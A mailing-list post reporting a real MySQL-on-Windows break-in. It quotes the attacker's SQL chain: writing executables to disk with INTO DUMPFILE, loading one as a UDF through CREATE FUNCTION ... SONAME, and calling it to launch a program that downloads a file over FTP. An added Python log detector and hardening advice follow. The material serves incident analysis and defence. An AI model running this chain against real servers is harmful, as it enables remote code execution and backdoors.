Possible vulnerability under Win32?

on 13.01.2005 10:01:02 by Mesdag

Before we continue, this is data extracted from a real-life hack.
This is not on my own system but on a remote system running Windows XP
Pro SP1 and running MySQL, Version: 4.1.3-beta-nt-max-log.
The hacker gained entry due to a missing root password (yeah, I know, it
is stupid; again, this was not my system) and installed software for a
backdoor and other stuff.
Yet this made me think:

Can any user run programs as in the example below?
Can you turn this behaviour off? (The manual states that GRANT EXECUTE
is not yet implemented)
Can this result be replicated with SQL injection (often used to hack
phpbb boards)?
Are *nix users also vulnerable to this?

Note: the IP is removed and the inserted data is also shortened. The
data contains hex and forms an FTP client. The other filenames are purely
fictional.

The queries:


DROP TABLE IF EXISTS filedata3
CREATE TABLE filedata3 (
filedata3 blob NOT NULL
) TYPE=MyISAM
Insert Into filedata3 (filedata3) values
(0x4D5A50000200000004....000000000000000)
SELECT filedata3 FROM filedata3 INTO DUMPFILE 'c:\\test.dll'
drop table filedata3

DROP TABLE IF EXISTS filedata5
CREATE TABLE filedata5 (
filedata5 blob NOT NULL
) TYPE=MyISAM
Insert Into filedata5 (filedata5) values
(0x4D5A50000200000004...000000000000000)
SELECT filedata5 FROM filedata5 INTO DUMPFILE 'c:\\yada.exe'
drop table filedata5
create function my_name returns string soname
'c:\\test.dll'
select my_name('start c:\\yada.exe ftp:///foo.exe bar.exe run')

Mesdag
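The query sequence above (write a blob to disk with INTO DUMPFILE, register it as a UDF with CREATE FUNCTION ... SONAME, call it) leaves a very recognisable trace in the MySQL general query log. The following detector is an added example, not code from the original post or from MySQL; it assumes the 4.1-era general log layout (timestamp, connection id, command, argument, with the timestamp omitted on consecutive lines within the same second) and runs over a constructed log that mirrors the post's queries with the blob literals shortened and a documentation-range client address. The rule names (pe_blob_insert, file_write, udf_load, udf_call) are my own.

```python
"""Flag the INTO DUMPFILE -> CREATE FUNCTION ... SONAME chain in a MySQL general query log."""
import re
from dataclasses import dataclass, field

# Constructed sample general query log (not from the original post). Blob
# literals are shortened; 203.0.113.5 is a documentation-range address.
SAMPLE_LOG = r"""
050113 10:01:02       7 Connect     root@203.0.113.5 on
                      7 Query       DROP TABLE IF EXISTS filedata3
                      7 Query       CREATE TABLE filedata3 (filedata3 blob NOT NULL) TYPE=MyISAM
050113 10:01:03       7 Query       Insert Into filedata3 (filedata3) values (0x4D5A50000200000004)
                      7 Query       SELECT filedata3 FROM filedata3 INTO DUMPFILE 'c:\\test.dll'
050113 10:01:04       7 Query       create function my_name returns string soname 'c:\\test.dll'
                      7 Query       select my_name('start c:\\yada.exe')
050113 10:05:00       8 Connect     app@localhost on shop
                      8 Query       SELECT id, name FROM products WHERE id = 42
"""

# One general-log line: optional timestamp, connection id, command, argument.
LINE_RE = re.compile(
    r"^(?:(?P<ts>\d{6}\s+\d{1,2}:\d{2}:\d{2}))?\s*(?P<conn>\d+)\s+(?P<cmd>\w+)\s*(?P<arg>.*)$"
)
# INSERT whose literal starts with 0x4D5A ("MZ"): a PE executable being staged in a table.
PE_LITERAL = re.compile(r"^\s*insert\b.*\b0x4d5a", re.I | re.S)
# Server-side file write; requires the FILE privilege.
FILE_WRITE = re.compile(r"\binto\s+(dumpfile|outfile)\s+'([^']*)'", re.I)
# UDF registration from a shared library on the server's filesystem.
UDF_LOAD = re.compile(
    r"\bcreate\s+(?:aggregate\s+)?function\s+`?(\w+)`?\s+returns\s+\w+\s+soname\s+'([^']*)'",
    re.I,
)


@dataclass
class Finding:
    conn: str
    user: str = "?"
    tags: list = field(default_factory=list)          # ordered, deduplicated rule hits
    written_files: list = field(default_factory=list)  # paths passed to DUMPFILE/OUTFILE
    udfs: dict = field(default_factory=dict)           # udf name -> shared library path

    def add(self, tag):
        if tag not in self.tags:
            self.tags.append(tag)

    @property
    def severity(self):
        # Full chain on one connection: a file was written, then loaded as a UDF.
        if "udf_load" in self.tags and "file_write" in self.tags:
            return "critical"
        if "udf_load" in self.tags or "file_write" in self.tags:
            return "high"
        return "low"


def analyze(log_text):
    """Return {connection id: Finding} for every connection that tripped a rule."""
    findings = {}
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        conn, cmd, arg = m["conn"], m["cmd"], m["arg"]
        f = findings.setdefault(conn, Finding(conn))
        if cmd == "Connect":
            f.user = arg.split()[0] if arg else "?"
            continue
        if cmd != "Query":
            continue
        if PE_LITERAL.search(arg):
            f.add("pe_blob_insert")
        fw = FILE_WRITE.search(arg)
        if fw:
            f.add("file_write")
            f.written_files.append(fw.group(2))
        ul = UDF_LOAD.search(arg)
        if ul:
            f.add("udf_load")
            f.udfs[ul.group(1).lower()] = ul.group(2)
        # A call to a function registered earlier on this connection.
        for name in f.udfs:
            if not ul and re.search(rf"\b{re.escape(name)}\s*\(", arg, re.I):
                f.add("udf_call")
    return {c: f for c, f in findings.items() if f.tags}


def report(findings):
    """Human-readable summary, one line per flagged connection."""
    return [
        f"conn {f.conn} ({f.user}): {f.severity} [{', '.join(f.tags)}] "
        f"files={f.written_files} udfs={f.udfs}"
        for f in findings.values()
    ]


if __name__ == "__main__":
    for line in report(analyze(SAMPLE_LOG)):
        print(line)
```

The correlation is per connection id, so a single OUTFILE write on one connection scores "high", while the write followed by a SONAME load on the same connection scores "critical". On the privilege side, in MySQL 4.1 SELECT ... INTO DUMPFILE needs the FILE privilege and CREATE FUNCTION ... SONAME needs INSERT on the mysql database (the mysql.func table); an unauthenticated root account has both, which is why the post's sequence worked. Auditing which accounts hold FILE and write access to the mysql database, and running mysqld under an unprivileged OS account so that whatever it writes cannot be loaded from arbitrary paths, is the corresponding hardening; later server releases also added secure_file_priv and restricted SONAME libraries to the plugin directory.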

--
MySQL Bugs Mailing List
For list archives: http://lists.mysql.com/bugs